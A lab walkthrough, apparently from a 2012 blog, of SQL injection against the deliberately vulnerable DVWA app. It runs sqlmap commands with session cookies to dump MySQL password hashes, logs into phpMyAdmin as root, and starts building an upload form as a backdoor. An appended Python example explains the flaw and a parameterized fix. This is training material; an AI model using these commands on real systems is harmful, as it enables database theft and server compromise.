Monday, 05 March 2012

SQL INJECTION DVWA (MEDIUM)

In this case I am using BackTrack 5 R1 as the server.

1. Access DVWA at "http://192.168.56.1/dvwa"

user name : admin
password : password
2. Set the security level to MEDIUM


3. Open Mantra and Burp Suite

In Mantra, do the following steps:

Create a proxy for Burp Suite

Open Burp Suite


4. Use the Burp Suite proxy, then use ' as the input

Shown in the URL


Result in Burp Suite


5. Run sqlmap
root@bt:/pentest/database/sqlmap# 


Showing the result


Search table



Search column



Now we can see the user and password

Showing





6. OK, we got the password, but our mission is how to make a backdoor on the server. Hmm, so we must try to exploit a service. I will try the MySQL service.

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "security=medium; PHPSESSID=33486pplno180m3afq6jpjout3" --dbs


I have tried a lot of ways but I can't upload the backdoor. To be continued...
=======================================================================

After that I tried again, repeating the basic ways.

>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" -D mysql --tables



>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" -D mysql -T user --column


>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" -D mysql -C password --dump


>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" --users --password



We can see that we get the same password.

>>> I try to open MySQL

I'm using password : root
and we can see I can manage the database. We will try to open phpMyAdmin.

>>> localhost/phpmyadmin
user : root
password : root



>>> Created database
Sinobi_db;

>>> Created table form

>>> Created table upload


>>> Created a form for upload.. "way for backdoor"
Insert the data into table camp

>>> Insert data into table upload
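Why the `id` parameter stays injectable when quotes are escaped, next to the corrected query, as an added example that is not code from the original post or from DVWA. It assumes the medium-level handler escapes quote characters but concatenates `id` into the query without quotes (the post does not show the source); an in-memory SQLite table with constructed rows stands in for MySQL, and all function names are hypothetical.

```python
import re
import sqlite3


def make_db():
    # Constructed sample rows standing in for the DVWA users table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "hash-a"), (2, "gordon", "hash-b"), (3, "pablo", "hash-c")],
    )
    return db


def escape_quotes(value):
    # Stand-in for quote escaping (assumed medium-level behaviour): it only
    # neutralises quote characters; digits, spaces and SQL keywords pass through.
    return value.replace("'", "''")


def lookup_medium_style(db, raw_id):
    # Weak: the escaped value lands in a numeric context with no surrounding
    # quotes, so the database parses the whole string as SQL.
    sql = ("SELECT first_name FROM users WHERE user_id = "
           + escape_quotes(raw_id) + " ORDER BY user_id")
    return [row[0] for row in db.execute(sql)]


def lookup_hardened(db, raw_id):
    # Fixed: accept only a plain integer, then bind it as a parameter so the
    # value can never change the structure of the statement.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a positive integer")
    rows = db.execute(
        "SELECT first_name FROM users WHERE user_id = ? ORDER BY user_id",
        (int(raw_id),),
    )
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    print(lookup_medium_style(db, "1"))         # one row, as intended
    print(lookup_medium_style(db, "1 OR 1=1"))  # every row, no quote needed
    print(lookup_hardened(db, "1"))             # one row
```

Binding the parameter removes the injection itself. Running the application under a database account that cannot read the `mysql` schema limits what any remaining flaw can reach.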





























